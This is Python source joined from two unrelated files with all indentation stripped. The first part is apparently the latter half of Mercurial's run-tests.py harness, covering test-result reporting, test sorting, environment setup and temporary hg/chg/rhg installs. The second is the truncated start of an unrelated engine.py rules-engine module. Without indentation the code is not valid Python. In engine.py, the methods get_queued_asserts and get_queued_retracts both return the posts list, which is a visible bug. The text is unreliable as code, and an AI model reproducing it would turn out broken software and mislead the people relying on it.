br"summary: +(?P<summary>[^\n]+)\n"
),
data,
(re.MULTILINE | re.DOTALL),
)
if m is None:
self.stream.writeln("Failed to identify failure point for %s" % test)
continue
dat = m.groupdict()
verb = "broken" if dat["goodbad"] == b"bad" else "fixed"
self.stream.writeln(
"%s %s by %s (%s)"
% (
test,
verb,
dat["node"].decode("ascii"),
dat["summary"].decode("utf8", "ignore"),
)
)
def printtimes(self, times):
# iolock held by run
self.stream.writeln("# Producing time report")
times.sort(key=lambda t: (t[3]))
cols = "%7.3f %7.3f %7.3f %7.3f %7.3f %s"
self.stream.writeln(
"%-7s %-7s %-7s %-7s %-7s %s"
% ("start", "end", "cuser", "csys", "real", "Test")
)
for tdata in times:
test = tdata[0]
cuser, csys, real, start, end = tdata[1:6]
self.stream.writeln(cols % (start, end, cuser, csys, real, test))
@staticmethod
def _writexunit(result, outf):
# See http://llg.cubic.org/docs/junit/ for a reference.
timesd = {t[0]: t[3] for t in result.times}
doc = minidom.Document()
s = doc.createElement("testsuite")
s.setAttribute("errors", "0") # TODO
s.setAttribute("failures", str(len(result.failures)))
s.setAttribute("name", "run-tests")
s.setAttribute("skipped", str(len(result.skipped) + len(result.ignored)))
s.setAttribute("tests", str(result.testsRun))
doc.appendChild(s)
for tc in result.successes:
t = doc.createElement("testcase")
t.setAttribute("name", tc.name)
tctime = timesd.get(tc.name)
if tctime is not None:
t.setAttribute("time", "%.3f" % tctime)
s.appendChild(t)
for tc, err in sorted(result.faildata.items()):
t = doc.createElement("testcase")
t.setAttribute("name", tc)
tctime = timesd.get(tc)
if tctime is not None:
t.setAttribute("time", "%.3f" % tctime)
# createCDATASection expects a unicode or it will
# convert using default conversion rules, which will
# fail if string isn't ASCII.
err = cdatasafe(err).decode("utf-8", "replace")
cd = doc.createCDATASection(err)
# Use 'failure' here instead of 'error' to match errors = 0,
# failures = len(result.failures) in the testsuite element.
failelem = doc.createElement("failure")
failelem.setAttribute("message", "output changed")
failelem.setAttribute("type", "output-mismatch")
failelem.appendChild(cd)
t.appendChild(failelem)
s.appendChild(t)
for tc, message in result.skipped:
# According to the schema, 'skipped' has no attributes. So store
# the skip message as a text node instead.
t = doc.createElement("testcase")
t.setAttribute("name", tc.name)
binmessage = message.encode("utf-8")
message = cdatasafe(binmessage).decode("utf-8", "replace")
cd = doc.createCDATASection(message)
skipelem = doc.createElement("skipped")
skipelem.appendChild(cd)
t.appendChild(skipelem)
s.appendChild(t)
outf.write(doc.toprettyxml(indent=" ", encoding="utf-8"))
@staticmethod
def _writejson(result, outf):
timesd = {}
for tdata in result.times:
test = tdata[0]
timesd[test] = tdata[1:]
outcome = {}
groups = [
("success", ((tc, None) for tc in result.successes)),
("failure", result.failures),
("skip", result.skipped),
]
for res, testcases in groups:
for tc, __ in testcases:
if tc.name in timesd:
diff = result.faildata.get(tc.name, b"")
try:
diff = diff.decode("unicode_escape")
except UnicodeDecodeError as e:
diff = "%r decoding diff, sorry" % e
tres = {
"result": res,
"time": ("%0.3f" % timesd[tc.name][2]),
"cuser": ("%0.3f" % timesd[tc.name][0]),
"csys": ("%0.3f" % timesd[tc.name][1]),
"start": ("%0.3f" % timesd[tc.name][3]),
"end": ("%0.3f" % timesd[tc.name][4]),
"diff": diff,
}
else:
# blacklisted test
tres = {"result": res}
outcome[tc.name] = tres
jsonout = json.dumps(outcome, sort_keys=True, indent=4, separators=(",", ": "))
outf.writelines(("testreport =", jsonout))
def sorttests(testdescs, previoustimes, shuffle=False):
"""Do an in-place sort of tests."""
if shuffle:
random.shuffle(testdescs)
return
if previoustimes:
def sortkey(f):
f = f["path"]
if f in previoustimes:
# Use most recent time as estimate
return -(previoustimes[f][-1])
else:
# Default to a rather arbitrary value of 1 second for new tests
return -1.0
else:
# keywords for slow tests
slow = {
b"svn": 10,
b"cvs": 10,
b"hghave": 10,
b"largefiles-update": 10,
b"run-tests": 10,
b"corruption": 10,
b"race": 10,
b"i18n": 10,
b"check": 100,
b"gendoc": 100,
b"contrib-perf": 200,
b"merge-combination": 100,
}
perf = {}
def sortkey(f):
# run largest tests first, as they tend to take the longest
f = f["path"]
try:
return perf[f]
except KeyError:
try:
val = -os.stat(f).st_size
except OSError as e:
if e.errno != errno.ENOENT:
raise
perf[f] = -1e9 # file does not exist, tell early
return -1e9
for kw, mul in slow.items():
if kw in f:
val *= mul
if f.endswith(b".py"):
val /= 10.0
perf[f] = val / 1000.0
return perf[f]
testdescs.sort(key=sortkey)
class TestRunner(object):
"""Holds context for executing tests.
Tests rely on a lot of state. This object holds it for them.
"""
# Programs required to run tests.
REQUIREDTOOLS = [
b"diff",
b"grep",
b"unzip",
b"gunzip",
b"bunzip2",
b"sed",
]
# Maps file extensions to test class.
TESTTYPES = [
(b".py", PythonTest),
(b".t", TTest),
]
def __init__(self):
self.options = None
self._hgroot = None
self._testdir = None
self._outputdir = None
self._hgtmp = None
self._installdir = None
self._bindir = None
self._tmpbindir = None
self._pythondir = None
self._coveragefile = None
self._createdfiles = []
self._hgcommand = None
self._hgpath = None
self._portoffset = 0
self._ports = {}
def run(self, args, parser=None):
"""Run the test suite."""
oldmask = os.umask(0o22)
try:
parser = parser or getparser()
options = parseargs(args, parser)
tests = [_sys2bytes(a) for a in options.tests]
if options.test_list is not None:
for listfile in options.test_list:
with open(listfile, "rb") as f:
tests.extend(t for t in f.read().splitlines() if t)
self.options = options
self._checktools()
testdescs = self.findtests(tests)
if options.profile_runner:
import statprof
statprof.start()
result = self._run(testdescs)
if options.profile_runner:
statprof.stop()
statprof.display()
return result
finally:
os.umask(oldmask)
def _run(self, testdescs):
testdir = getcwdb()
self._testdir = osenvironb[b"TESTDIR"] = getcwdb()
# assume all tests in same folder for now
if testdescs:
pathname = os.path.dirname(testdescs[0]["path"])
if pathname:
testdir = os.path.join(testdir, pathname)
self._testdir = osenvironb[b"TESTDIR"] = testdir
if self.options.outputdir:
self._outputdir = canonpath(_sys2bytes(self.options.outputdir))
else:
self._outputdir = getcwdb()
if testdescs and pathname:
self._outputdir = os.path.join(self._outputdir, pathname)
previoustimes = {}
if self.options.order_by_runtime:
previoustimes = dict(loadtimes(self._outputdir))
sorttests(testdescs, previoustimes, shuffle=self.options.random)
if "PYTHONHASHSEED" not in os.environ:
# use a random python hash seed all the time
# we do the randomness ourself to know what seed is used
os.environ["PYTHONHASHSEED"] = str(random.getrandbits(32))
# Rayon (Rust crate for multi-threading) will use all logical CPU cores
# by default, causing thrashing on high-cpu-count systems.
# Setting its limit to 3 during tests should still let us uncover
# multi-threading bugs while keeping the thrashing reasonable.
os.environ.setdefault("RAYON_NUM_THREADS", "3")
if self.options.tmpdir:
self.options.keep_tmpdir = True
tmpdir = _sys2bytes(self.options.tmpdir)
if os.path.exists(tmpdir):
# Meaning of tmpdir has changed since 1.3: we used to create
# HGTMP inside tmpdir; now HGTMP is tmpdir. So fail if
# tmpdir already exists.
print("error: temp dir %r already exists" % tmpdir)
return 1
os.makedirs(tmpdir)
else:
d = None
if os.name == "nt":
# without this, we get the default temp dir location, but
# in all lowercase, which causes troubles with paths (issue3490)
d = osenvironb.get(b"TMP", None)
tmpdir = tempfile.mkdtemp(b"", b"hgtests.", d)
self._hgtmp = osenvironb[b"HGTMP"] = os.path.realpath(tmpdir)
if self.options.with_hg:
self._installdir = None
whg = self.options.with_hg
self._bindir = os.path.dirname(os.path.realpath(whg))
assert isinstance(self._bindir, bytes)
self._hgcommand = os.path.basename(whg)
self._tmpbindir = os.path.join(self._hgtmp, b"install", b"bin")
os.makedirs(self._tmpbindir)
normbin = os.path.normpath(os.path.abspath(whg))
normbin = normbin.replace(_sys2bytes(os.sep), b"/")
# Other Python scripts in the test harness need to
# `import mercurial`. If `hg` is a Python script, we assume
# the Mercurial modules are relative to its path and tell the tests
# to load Python modules from its directory.
with open(whg, "rb") as fh:
initial = fh.read(1024)
if re.match(b"#!.*python", initial):
self._pythondir = self._bindir
# If it looks like our in-repo Rust binary, use the source root.
# This is a bit hacky. But rhg is still not supported outside the
# source directory. So until it is, do the simple thing.
elif re.search(b"/rust/target/[^/]+/hg", normbin):
self._pythondir = os.path.dirname(self._testdir)
# Fall back to the legacy behavior.
else:
self._pythondir = self._bindir
else:
self._installdir = os.path.join(self._hgtmp, b"install")
self._bindir = os.path.join(self._installdir, b"bin")
self._hgcommand = b"hg"
self._tmpbindir = self._bindir
self._pythondir = os.path.join(self._installdir, b"lib", b"python")
# Force the use of hg.exe instead of relying on MSYS to recognize hg is
# a python script and feed it to python.exe. Legacy stdio is force
# enabled by hg.exe, and this is a more realistic way to launch hg
# anyway.
if os.name == "nt" and not self._hgcommand.endswith(b".exe"):
self._hgcommand += b".exe"
# set CHGHG, then replace "hg" command by "chg"
chgbindir = self._bindir
if self.options.chg or self.options.with_chg:
osenvironb[b"CHGHG"] = os.path.join(self._bindir, self._hgcommand)
else:
osenvironb.pop(b"CHGHG", None) # drop flag for hghave
if self.options.chg:
self._hgcommand = b"chg"
elif self.options.with_chg:
chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
self._hgcommand = os.path.basename(self.options.with_chg)
# configure fallback and replace "hg" command by "rhg"
rhgbindir = self._bindir
if self.options.rhg or self.options.with_rhg:
# Affects hghave.py
osenvironb[b"RHG_INSTALLED_AS_HG"] = b"1"
# Affects configuration. Alternatives would be setting configuration through
# `$HGRCPATH` but some tests override that, or changing `_hgcommand` to include
# `--config` but that disrupts tests that print command lines and check expected
# output.
osenvironb[b"RHG_ON_UNSUPPORTED"] = b"fallback"
osenvironb[b"RHG_FALLBACK_EXECUTABLE"] = os.path.join(
self._bindir, self._hgcommand
)
if self.options.rhg:
self._hgcommand = b"rhg"
elif self.options.with_rhg:
rhgbindir = os.path.dirname(os.path.realpath(self.options.with_rhg))
self._hgcommand = os.path.basename(self.options.with_rhg)
osenvironb[b"BINDIR"] = self._bindir
osenvironb[b"PYTHON"] = PYTHON
fileb = _sys2bytes(__file__)
runtestdir = os.path.abspath(os.path.dirname(fileb))
osenvironb[b"RUNTESTDIR"] = runtestdir
if PYTHON3:
sepb = _sys2bytes(os.pathsep)
else:
sepb = os.pathsep
path = [self._bindir, runtestdir] + osenvironb[b"PATH"].split(sepb)
if os.path.islink(__file__):
# test helper will likely be at the end of the symlink
realfile = os.path.realpath(fileb)
realdir = os.path.abspath(os.path.dirname(realfile))
path.insert(2, realdir)
if chgbindir != self._bindir:
path.insert(1, chgbindir)
if rhgbindir != self._bindir:
path.insert(1, rhgbindir)
if self._testdir != runtestdir:
path = [self._testdir] + path
if self._tmpbindir != self._bindir:
path = [self._tmpbindir] + path
osenvironb[b"PATH"] = sepb.join(path)
# Include TESTDIR in PYTHONPATH so that out-of-tree extensions
# can run .../tests/run-tests.py test-foo where test-foo
# adds an extension to HGRC. Also include run-test.py directory to
# import modules like heredoctest.
pypath = [self._pythondir, self._testdir, runtestdir]
# We have to augment PYTHONPATH, rather than simply replacing
# it, in case external libraries are only available via current
# PYTHONPATH. (In particular, the Subversion bindings on OS X
# are in /opt/subversion.)
oldpypath = osenvironb.get(IMPL_PATH)
if oldpypath:
pypath.append(oldpypath)
osenvironb[IMPL_PATH] = sepb.join(pypath)
if self.options.pure:
os.environ["HGTEST_RUN_TESTS_PURE"] = "--pure"
os.environ["HGMODULEPOLICY"] = "py"
if self.options.rust:
os.environ["HGMODULEPOLICY"] = "rust+c"
if self.options.no_rust:
current_policy = os.environ.get("HGMODULEPOLICY", "")
if current_policy.startswith("rust+"):
os.environ["HGMODULEPOLICY"] = current_policy[len("rust+") :]
os.environ.pop("HGWITHRUSTEXT", None)
if self.options.allow_slow_tests:
os.environ["HGTEST_SLOW"] = "slow"
elif "HGTEST_SLOW" in os.environ:
del os.environ["HGTEST_SLOW"]
self._coveragefile = os.path.join(self._testdir, b".coverage")
if self.options.exceptions:
exceptionsdir = os.path.join(self._outputdir, b"exceptions")
try:
os.makedirs(exceptionsdir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Remove all existing exception reports.
for f in os.listdir(exceptionsdir):
os.unlink(os.path.join(exceptionsdir, f))
osenvironb[b"HGEXCEPTIONSDIR"] = exceptionsdir
logexceptions = os.path.join(self._testdir, b"logexceptions.py")
self.options.extra_config_opt.append(
"extensions.logexceptions=%s" % logexceptions.decode("utf-8")
)
vlog("# Using TESTDIR", _bytes2sys(self._testdir))
vlog("# Using RUNTESTDIR", _bytes2sys(osenvironb[b"RUNTESTDIR"]))
vlog("# Using HGTMP", _bytes2sys(self._hgtmp))
vlog("# Using PATH", os.environ["PATH"])
vlog(
"# Using",
_bytes2sys(IMPL_PATH),
_bytes2sys(osenvironb[IMPL_PATH]),
)
vlog("# Writing to directory", _bytes2sys(self._outputdir))
try:
return self._runtests(testdescs) or 0
finally:
time.sleep(0.1)
self._cleanup()
def findtests(self, args):
"""Finds possible test files from arguments.
If you wish to inject custom tests into the test harness, this would
be a good function to monkeypatch or override in a derived class.
"""
if not args:
if self.options.changed:
proc = Popen4(
b'hg st --rev "%s" -man0 .' % _sys2bytes(self.options.changed),
None,
0,
)
stdout, stderr = proc.communicate()
args = stdout.strip(b"\0").split(b"\0")
else:
args = os.listdir(b".")
expanded_args = []
for arg in args:
if os.path.isdir(arg):
if not arg.endswith(b"/"):
arg += b"/"
expanded_args.extend([arg + a for a in os.listdir(arg)])
else:
expanded_args.append(arg)
args = expanded_args
testcasepattern = re.compile(br"([\w-]+\.t|py)(?:#([a-zA-Z0-9_\-.#]+))")
tests = []
for t in args:
case = []
if not (
os.path.basename(t).startswith(b"test-")
and (t.endswith(b".py") or t.endswith(b".t"))
):
m = testcasepattern.match(os.path.basename(t))
if m is not None:
t_basename, casestr = m.groups()
t = os.path.join(os.path.dirname(t), t_basename)
if casestr:
case = casestr.split(b"#")
else:
continue
if t.endswith(b".t"):
# .t file may contain multiple test cases
casedimensions = parsettestcases(t)
if casedimensions:
cases = []
def addcases(case, casedimensions):
if not casedimensions:
cases.append(case)
else:
for c in casedimensions[0]:
addcases(case + [c], casedimensions[1:])
addcases([], casedimensions)
if case and case in cases:
cases = [case]
elif case:
# Ignore invalid cases
cases = []
else:
pass
tests += [{"path": t, "case": c} for c in sorted(cases)]
else:
tests.append({"path": t})
else:
tests.append({"path": t})
if self.options.retest:
retest_args = []
for test in tests:
errpath = self._geterrpath(test)
if os.path.exists(errpath):
retest_args.append(test)
tests = retest_args
return tests
def _runtests(self, testdescs):
def _reloadtest(test, i):
# convert a test back to its description dict
desc = {"path": test.path}
case = getattr(test, "_case", [])
if case:
desc["case"] = case
return self._gettest(desc, i)
try:
if self.options.restart:
orig = list(testdescs)
while testdescs:
desc = testdescs[0]
errpath = self._geterrpath(desc)
if os.path.exists(errpath):
break
testdescs.pop(0)
if not testdescs:
print("running all tests")
testdescs = orig
tests = [self._gettest(d, i) for i, d in enumerate(testdescs)]
num_tests = len(tests) * self.options.runs_per_test
jobs = min(num_tests, self.options.jobs)
failed = False
kws = self.options.keywords
if kws is not None and PYTHON3:
kws = kws.encode("utf-8")
suite = TestSuite(
self._testdir,
jobs=jobs,
whitelist=self.options.whitelisted,
blacklist=self.options.blacklist,
keywords=kws,
loop=self.options.loop,
runs_per_test=self.options.runs_per_test,
showchannels=self.options.showchannels,
tests=tests,
loadtest=_reloadtest,
)
verbosity = 1
if self.options.list_tests:
verbosity = 0
elif self.options.verbose:
verbosity = 2
runner = TextTestRunner(self, verbosity=verbosity)
if self.options.list_tests:
result = runner.listtests(suite)
else:
if self._installdir:
self._installhg()
self._checkhglib("Testing")
else:
self._usecorrectpython()
if self.options.chg:
assert self._installdir
self._installchg()
if self.options.rhg:
assert self._installdir
self._installrhg()
log("running %d tests using %d parallel processes" % (num_tests, jobs))
result = runner.run(suite)
if result.failures or result.errors:
failed = True
result.onEnd()
if self.options.anycoverage:
self._outputcoverage()
except KeyboardInterrupt:
failed = True
print("\ninterrupted!")
if failed:
return 1
def _geterrpath(self, test):
# test['path'] is a relative path
if "case" in test:
# for multiple dimensions test cases
casestr = b"#".join(test["case"])
errpath = b"%s#%s.err" % (test["path"], casestr)
else:
errpath = b"%s.err" % test["path"]
if self.options.outputdir:
self._outputdir = canonpath(_sys2bytes(self.options.outputdir))
errpath = os.path.join(self._outputdir, errpath)
return errpath
def _getport(self, count):
port = self._ports.get(count) # do we have a cached entry?
if port is None:
portneeded = 3
# above 100 tries we just give up and let test reports failure
for tries in xrange(100):
allfree = True
port = self.options.port + self._portoffset
for idx in xrange(portneeded):
if not checkportisavailable(port + idx):
allfree = False
break
self._portoffset += portneeded
if allfree:
break
self._ports[count] = port
return port
def _gettest(self, testdesc, count):
"""Obtain a Test by looking at its filename.
Returns a Test instance. The Test may not be runnable if it doesn't
map to a known type.
"""
path = testdesc["path"]
lctest = path.lower()
testcls = Test
for ext, cls in self.TESTTYPES:
if lctest.endswith(ext):
testcls = cls
break
refpath = os.path.join(getcwdb(), path)
tmpdir = os.path.join(self._hgtmp, b"child%d" % count)
# extra keyword parameters. 'case' is used by .t tests
kwds = {k: testdesc[k] for k in ["case"] if k in testdesc}
t = testcls(
refpath,
self._outputdir,
tmpdir,
keeptmpdir=self.options.keep_tmpdir,
debug=self.options.debug,
first=self.options.first,
timeout=self.options.timeout,
startport=self._getport(count),
extraconfigopts=self.options.extra_config_opt,
shell=self.options.shell,
hgcommand=self._hgcommand,
usechg=bool(self.options.with_chg or self.options.chg),
chgdebug=self.options.chg_debug,
useipv6=useipv6,
**kwds
)
t.should_reload = True
return t
def _cleanup(self):
"""Clean up state from this test invocation."""
if self.options.keep_tmpdir:
return
vlog("# Cleaning up HGTMP", _bytes2sys(self._hgtmp))
shutil.rmtree(self._hgtmp, True)
for f in self._createdfiles:
try:
os.remove(f)
except OSError:
pass
def _usecorrectpython(self):
"""Configure the environment to use the appropriate Python in tests."""
# Tests must use the same interpreter as us or bad things will happen.
pyexename = sys.platform == "win32" and b"python.exe" or b"python3"
# os.symlink() is a thing with py3 on Windows, but it requires
# Administrator rights.
if getattr(os, "symlink", None) and os.name != "nt":
vlog(
"# Making python executable in test path a symlink to '%s'"
% sysexecutable
)
mypython = os.path.join(self._tmpbindir, pyexename)
try:
if os.readlink(mypython) == sysexecutable:
return
os.unlink(mypython)
except OSError as err:
if err.errno != errno.ENOENT:
raise
if self._findprogram(pyexename) != sysexecutable:
try:
os.symlink(sysexecutable, mypython)
self._createdfiles.append(mypython)
except OSError as err:
# child processes may race, which is harmless
if err.errno != errno.EEXIST:
raise
else:
# Windows doesn't have `python3.exe`, and MSYS cannot understand the
# reparse point with that name provided by Microsoft. Create a
# simple script on PATH with that name that delegates to the py3
# launcher so the shebang lines work.
if os.getenv("MSYSTEM"):
with open(osenvironb[b"RUNTESTDIR"] + b"/python3", "wb") as f:
f.write(b"#!/bin/sh\n")
f.write(b'py -3 "$@"\n')
exedir, exename = os.path.split(sysexecutable)
vlog(
"# Modifying search path to find %s as %s in '%s'"
% (exename, pyexename, exedir)
)
path = os.environ["PATH"].split(os.pathsep)
while exedir in path:
path.remove(exedir)
# Binaries installed by pip into the user area like pylint.exe may
# not be in PATH by default.
extra_paths = [exedir]
vi = sys.version_info
if "APPDATA" in os.environ:
scripts_dir = os.path.join(
os.environ["APPDATA"],
"Python",
"Python%d%d" % (vi[0], vi[1]),
"Scripts",
)
if vi.major == 2:
scripts_dir = os.path.join(
os.environ["APPDATA"],
"Python",
"Scripts",
)
extra_paths.append(scripts_dir)
os.environ["PATH"] = os.pathsep.join(extra_paths + path)
if not self._findprogram(pyexename):
print("WARNING: Cannot find %s in search path" % pyexename)
def _installhg(self):
"""Install hg into the test environment.
This will also configure hg with the appropriate testing settings.
"""
vlog("# Performing temporary installation of HG")
installerrs = os.path.join(self._hgtmp, b"install.err")
compiler = ""
if self.options.compiler:
compiler = "--compiler " + self.options.compiler
setup_opts = b""
if self.options.pure:
setup_opts = b"--pure"
elif self.options.rust:
setup_opts = b"--rust"
elif self.options.no_rust:
setup_opts = b"--no-rust"
# Run installer in hg root
script = os.path.realpath(sys.argv[0])
exe = sysexecutable
if PYTHON3:
compiler = _sys2bytes(compiler)
script = _sys2bytes(script)
exe = _sys2bytes(exe)
hgroot = os.path.dirname(os.path.dirname(script))
self._hgroot = hgroot
os.chdir(hgroot)
nohome = b'--home=""'
if os.name == "nt":
# The --home="" trick works only on OS where os.sep == '/'
# because of a distutils convert_path() fast-path. Avoid it at
# least on Windows for now, deal with .pydistutils.cfg bugs
# when they happen.
nohome = b""
cmd = (
b'"%(exe)s" setup.py %(setup_opts)s clean --all'
b' build %(compiler)s --build-base="%(base)s"'
b' install --force --prefix="%(prefix)s"'
b' --install-lib="%(libdir)s"'
b' --install-scripts="%(bindir)s" %(nohome)s >%(logfile)s 2>&1'
% {
b"exe": exe,
b"setup_opts": setup_opts,
b"compiler": compiler,
b"base": os.path.join(self._hgtmp, b"build"),
b"prefix": self._installdir,
b"libdir": self._pythondir,
b"bindir": self._bindir,
b"nohome": nohome,
b"logfile": installerrs,
}
)
# setuptools requires install directories to exist.
def makedirs(p):
try:
os.makedirs(p)
except OSError as e:
if e.errno != errno.EEXIST:
raise
makedirs(self._pythondir)
makedirs(self._bindir)
vlog("# Running", cmd.decode("utf-8"))
if subprocess.call(_bytes2sys(cmd), shell=True) == 0:
if not self.options.verbose:
try:
os.remove(installerrs)
except OSError as e:
if e.errno != errno.ENOENT:
raise
else:
with open(installerrs, "rb") as f:
for line in f:
if PYTHON3:
sys.stdout.buffer.write(line)
else:
sys.stdout.write(line)
sys.exit(1)
os.chdir(self._testdir)
self._usecorrectpython()
hgbat = os.path.join(self._bindir, b"hg.bat")
if os.path.isfile(hgbat):
# hg.bat expects to be put in bin/scripts while run-tests.py
# installation layout put it in bin/ directly. Fix it
with open(hgbat, "rb") as f:
data = f.read()
if br'"%~dp0..\python" "%~dp0hg" %*' in data:
data = data.replace(
br'"%~dp0..\python" "%~dp0hg" %*',
b'"%~dp0python" "%~dp0hg" %*',
)
with open(hgbat, "wb") as f:
f.write(data)
else:
print("WARNING: cannot fix hg.bat reference to python.exe")
if self.options.anycoverage:
custom = os.path.join(osenvironb[b"RUNTESTDIR"], b"sitecustomize.py")
target = os.path.join(self._pythondir, b"sitecustomize.py")
vlog("# Installing coverage trigger to %s" % target)
shutil.copyfile(custom, target)
rc = os.path.join(self._testdir, b".coveragerc")
vlog("# Installing coverage rc to %s" % rc)
osenvironb[b"COVERAGE_PROCESS_START"] = rc
covdir = os.path.join(self._installdir, b"..", b"coverage")
try:
os.mkdir(covdir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
osenvironb[b"COVERAGE_DIR"] = covdir
def _checkhglib(self, verb):
"""Ensure that the 'mercurial' package imported by python is
the one we expect it to be. If not, print a warning to stderr."""
if (self._bindir == self._pythondir) and (self._bindir != self._tmpbindir):
# The pythondir has been inferred from --with-hg flag.
# We cannot expect anything sensible here.
return
expecthg = os.path.join(self._pythondir, b"mercurial")
actualhg = self._gethgpath()
if os.path.abspath(actualhg) != os.path.abspath(expecthg):
sys.stderr.write(
"warning: %s with unexpected mercurial lib: %s\n"
" (expected %s)\n" % (verb, actualhg, expecthg)
)
def _gethgpath(self):
"""Return the path to the mercurial package that is actually found by
the current Python interpreter."""
if self._hgpath is not None:
return self._hgpath
cmd = b'"%s" -c "import mercurial; print (mercurial.__path__[0])"'
cmd = cmd % PYTHON
if PYTHON3:
cmd = _bytes2sys(cmd)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
out, err = p.communicate()
self._hgpath = out.strip()
return self._hgpath
def _installchg(self):
"""Install chg into the test environment"""
vlog("# Performing temporary installation of CHG")
assert os.path.dirname(self._bindir) == self._installdir
assert self._hgroot, "must be called after _installhg()"
cmd = b'"%(make)s" clean install PREFIX="%(prefix)s"' % {
b"make": b"make", # TODO: switch by option or environment?
b"prefix": self._installdir,
}
cwd = os.path.join(self._hgroot, b"contrib", b"chg")
vlog("# Running", cmd)
proc = subprocess.Popen(
cmd,
shell=True,
cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
out, _err = proc.communicate()
if proc.returncode != 0:
if PYTHON3:
sys.stdout.buffer.write(out)
else:
sys.stdout.write(out)
sys.exit(1)
def _installrhg(self):
"""Install rhg into the test environment"""
vlog("# Performing temporary installation of rhg")
assert os.path.dirname(self._bindir) == self._installdir
assert self._hgroot, "must be called after _installhg()"
cmd = b'"%(make)s" install-rhg PREFIX="%(prefix)s"' % {
b"make": b"make", # TODO: switch by option or environment?
b"prefix": self._installdir,
}
cwd = self._hgroot
vlog("# Running", cmd)
proc = subprocess.Popen(
cmd,
shell=True,
cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
out, _err = proc.communicate()
if proc.returncode != 0:
if PYTHON3:
sys.stdout.buffer.write(out)
else:
sys.stdout.write(out)
sys.exit(1)
def _outputcoverage(self):
"""Produce code coverage output."""
import coverage
coverage = coverage.coverage
vlog("# Producing coverage report")
# chdir is the easiest way to get short, relative paths in the
# output.
os.chdir(self._hgroot)
covdir = os.path.join(_bytes2sys(self._installdir), "..", "coverage")
cov = coverage(data_file=os.path.join(covdir, "cov"))
# Map install directory paths back to source directory.
cov.config.paths["srcdir"] = [".", _bytes2sys(self._pythondir)]
cov.combine()
omit = [
_bytes2sys(os.path.join(x, b"*")) for x in [self._bindir, self._testdir]
]
cov.report(ignore_errors=True, omit=omit)
if self.options.htmlcov:
htmldir = os.path.join(_bytes2sys(self._outputdir), "htmlcov")
cov.html_report(directory=htmldir, omit=omit)
if self.options.annotate:
adir = os.path.join(_bytes2sys(self._outputdir), "annotated")
if not os.path.isdir(adir):
os.mkdir(adir)
cov.annotate(directory=adir, omit=omit)
def _findprogram(self, program):
"""Search PATH for a executable program"""
dpb = _sys2bytes(os.defpath)
sepb = _sys2bytes(os.pathsep)
for p in osenvironb.get(b"PATH", dpb).split(sepb):
name = os.path.join(p, program)
if os.name == "nt" or os.access(name, os.X_OK):
return _bytes2sys(name)
return None
def _checktools(self):
"""Ensure tools required to run tests are present."""
for p in self.REQUIREDTOOLS:
if os.name == "nt" and not p.endswith(b".exe"):
p += b".exe"
found = self._findprogram(p)
p = p.decode("utf-8")
if found:
vlog("# Found prerequisite", p, "at", found)
else:
print("WARNING: Did not find prerequisite tool: %s " % p)
def aggregateexceptions(path):
exceptioncounts = collections.Counter()
testsbyfailure = collections.defaultdict(set)
failuresbytest = collections.defaultdict(set)
for f in os.listdir(path):
with open(os.path.join(path, f), "rb") as fh:
data = fh.read().split(b"\0")
if len(data) != 5:
continue
exc, mainframe, hgframe, hgline, testname = data
exc = exc.decode("utf-8")
mainframe = mainframe.decode("utf-8")
hgframe = hgframe.decode("utf-8")
hgline = hgline.decode("utf-8")
testname = testname.decode("utf-8")
key = (hgframe, hgline, exc)
exceptioncounts[key] += 1
testsbyfailure[key].add(testname)
failuresbytest[testname].add(key)
# Find test having fewest failures for each failure.
leastfailing = {}
for key, tests in testsbyfailure.items():
fewesttest = None
fewestcount = 99999999
for test in sorted(tests):
if len(failuresbytest[test]) < fewestcount:
fewesttest = test
fewestcount = len(failuresbytest[test])
leastfailing[key] = (fewestcount, fewesttest)
# Create a combined counter so we can sort by total occurrences and
# impacted tests.
combined = {}
for key in exceptioncounts:
combined[key] = (
exceptioncounts[key],
len(testsbyfailure[key]),
leastfailing[key][0],
leastfailing[key][1],
)
return {
"exceptioncounts": exceptioncounts,
"total": sum(exceptioncounts.values()),
"combined": combined,
"leastfailing": leastfailing,
"byfailure": testsbyfailure,
"bytest": failuresbytest,
}
if __name__ == "__main__":
runner = TestRunner()
try:
import msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
except ImportError:
pass
sys.exit(runner.run(sys.argv[1:]))
|
engine.py
|
import json
import copy
import rules
import threading
import inspect
import random
import time
import datetime
import os
import sys
import traceback
def _unix_now():
dt = datetime.datetime.now()
epoch = datetime.datetime.utcfromtimestamp(0)
delta = dt - epoch
return delta.total_seconds()
class Closure_Queue(object):
def __init__(self):
self._queued_posts = []
self._queued_asserts = []
self._queued_retracts = []
def get_queued_posts(self):
return self._queued_posts
def get_queued_asserts(self):
return self._queued_posts
def get_queued_retracts(self):
return self._queued_posts
def post(self, message):
if isinstance(message, Content):
message = message._d
self._queued_posts.append(message)
def assert_fact(self, message):
if isinstance(message, Content):
message = message._d
self._queued_asserts.append(message)
def retract_fact(self, message):
if isinstance(message, Content):
message = message._d
self._queued_retracts.append(message)
class Closure(object):
def __init__(self, host, state, message, handle, ruleset_name):
self.ruleset_name = ruleset_name
self.host = host
self.s = Content(state)
self._handle = handle
self._timer_directory = {}
self._cancelled_timer_directory = {}
self._message_directory = {}
self._queue_directory = {}
self._branch_directory = {}
self._fact_directory = {}
self._delete_directory = {}
self._retract_directory = {}
self._completed = False
self._deleted = False
self._start_time = _unix_now()
if isinstance(message, dict):
self._m = message
else:
self.m = []
for one_message in message:
if ('m' in one_message) and len(one_message) == 1:
one_message = one_message['m']
self.m.append(Content(one_message))
def get_timers(self):
return self._timer_directory
def get_cancelled_timers(self):
return self._cancelled_timer_directory
def get_branches(self):
return self._branch_directory
def get_messages(self):
return self._message_directory
def get_queues(self):
return self._queue_directory
def get_deletes(self):
return self._delete_directory
def get_facts(self):
return self._fact_directory
def get_retract_facts(self):
return self._retract_directory
def get_queue(self, ruleset_name):
if not ruleset_name in self._queue_directory:
self._queue_directory[ruleset_name] = Closure_Queue()
return self._queue_directory[ruleset_name]
def post(self, ruleset_name, message = None):
if not message:
message = ruleset_name
